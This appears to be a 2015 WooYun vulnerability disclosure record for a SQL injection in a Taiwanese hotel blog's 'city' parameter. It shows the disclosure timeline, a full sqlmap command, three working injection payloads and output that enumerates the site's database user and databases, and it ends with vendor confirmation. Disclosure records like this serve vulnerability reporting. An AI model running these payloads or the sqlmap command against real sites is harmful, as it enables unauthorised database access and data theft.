WooYun (WooYun.org) historical vulnerability search: http://wy.zone.ci/
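2015-03-31: Details reported to the vendor; awaiting vendor handling
2015-04-03: Vendor confirmed; details disclosed to the vendor only
2015-04-13: Details disclosed to core white hats and experts in related fields
2015-04-23: Details disclosed to regular white hats
2015-05-03: Details disclosed to intern white hats
2015-05-18: Details disclosed to the public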
RT
[root@Hacker~]# Sqlmap sqlmap.py -u "http://chi.gogoblog.tw/hotels_city.php?city=kaohsiung&Page=1&p=new" --dbs --passwords --current-user --current-db --is-dba
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and fede
[*] starting at 13:53:53
[13:53:53] [INFO] resuming back-end DBMS 'mysql'
[13:53:53] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: city
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: city=kaohsiung' AND 3934=3934 AND 'uvNB'='uvNB&Page=1&p=new
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: city=kaohsiung' AND (SELECT 9431 FROM(SELECT COUNT(*),CONCAT(0x716c626571,(SELECT (CASE WHEN (9431=9431) THEN 1 ELSE 0 END)),0x717a746971,FLOOR(RAND(0)*2))x FROM INFORM
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: city=kaohsiung' AND SLEEP(5) AND 'NMSk'='NMSk&Page=1&p=new
---
[13:53:54] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[13:53:54] [INFO] fetching current user
[13:53:54] [INFO] resumed: chiblog@%
current user: 'chiblog@%'
[13:53:54] [INFO] fetching current database
[13:53:54] [INFO] resumed: chiblog
current database: 'chiblog'
[13:53:54] [INFO] testing if current user is DBA
[13:53:54] [INFO] fetching current user
[13:53:54] [INFO] heuristics detected web page charset 'utf-8'
current user is DBA: False
[13:53:54] [INFO] fetching database users password hashes
[13:53:54] [WARNING] the SQL query provided does not return any output
[13:53:54] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[13:53:54] [INFO] fetching database users
[13:53:54] [INFO] the SQL query used returns 1 entries
[13:53:54] [INFO] resumed: 'chiblog'@'%'
[13:53:54] [INFO] fetching number of password hashes for user 'chiblog'
[13:53:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:53:54] [INFO] retrieved:
[13:53:55] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[13:54:04] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[13:54:04] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[13:54:04] [WARNING] unable to retrieve the number of password hashes for user 'chiblog'
[13:54:04] [ERROR] unable to retrieve the password hashes for the database users (most probably because the session user has no read privileges over the relevant system database tab
[13:54:04] [INFO] fetching database names
[13:54:04] [INFO] the SQL query used returns 2 entries
[13:54:04] [INFO] resumed: information_schema
[13:54:04] [INFO] resumed: chiblog
available databases [2]:
[*] chiblog
[*] information_schema
[13:54:04] [INFO] fetched data logged to text files under 'E:\INJECT~1\SQLMAP~1.4\Bin\output\chi.gogoblog.tw'
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-04-03 02:15
Thank you for the report
None yet